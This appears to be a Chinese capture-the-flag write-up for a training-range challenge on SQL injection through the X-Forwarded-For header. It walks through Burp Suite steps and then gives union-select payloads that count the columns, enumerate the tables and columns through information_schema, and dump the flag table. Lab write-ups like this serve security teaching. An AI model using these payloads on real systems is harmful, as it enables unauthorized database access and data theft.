墨者学院-在线靶场-HTTP头注入漏洞测试(X-Forwarded-for) Writeup

首先题目提示

XFF注入,大致思路为Burp抓包添加XFF请求头进行注入。
启动靶场
点击进入墨者的任性网页

Burpsuite抓包,放进Repeater

先GO一下
在这里插入图片描述
在请求头中添加X-Forwarded-For
试了试 'and 1=1and 1=2都没反应
当改为or 1=1时,提示语法错误
在这里插入图片描述
在这里插入图片描述
继续,union注入步骤

order by 5显示未知字段,order by 4返回正常

得到数据库中的字段数

在这里插入图片描述
在这里插入图片描述

union select 1,2,3,4

看看有哪些回显点,发现多了一行商品,名称,价格,数量分别为2,3,4
在这里插入图片描述
在这里插入图片描述
爆数据库版本和数据库名

union select 1,2,version(),database()

在这里插入图片描述
在这里插入图片描述

union select 1,2,(select table_name from information_schema.tables where table_schema = 'pentesterlab' limit 0,1),database()

第一个表名为comment

union select 1,2,(select table_name from information_schema.tables where table_schema = 'pentesterlab' limit 1,1),database()

在这里插入图片描述
在这里插入图片描述
第二个表名为flag,应该是这个表了。

继续

union select 1,2,(select column_name from information_schema.columns where table_name = 'flag' limit 0,1),database()

第一个字段名为id,再试试第二个

union select 1,2,(select column_name from information_schema.columns where table_name = 'flag' limit 1,1),database()

在这里插入图片描述
flag应该就在这个字段中

union select 1,2,(select flag from pentesterlab.flag limit 0,1),database()

得到flag
在这里插入图片描述
回到最初页面,验证flag,得到key。
在这里插入图片描述
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值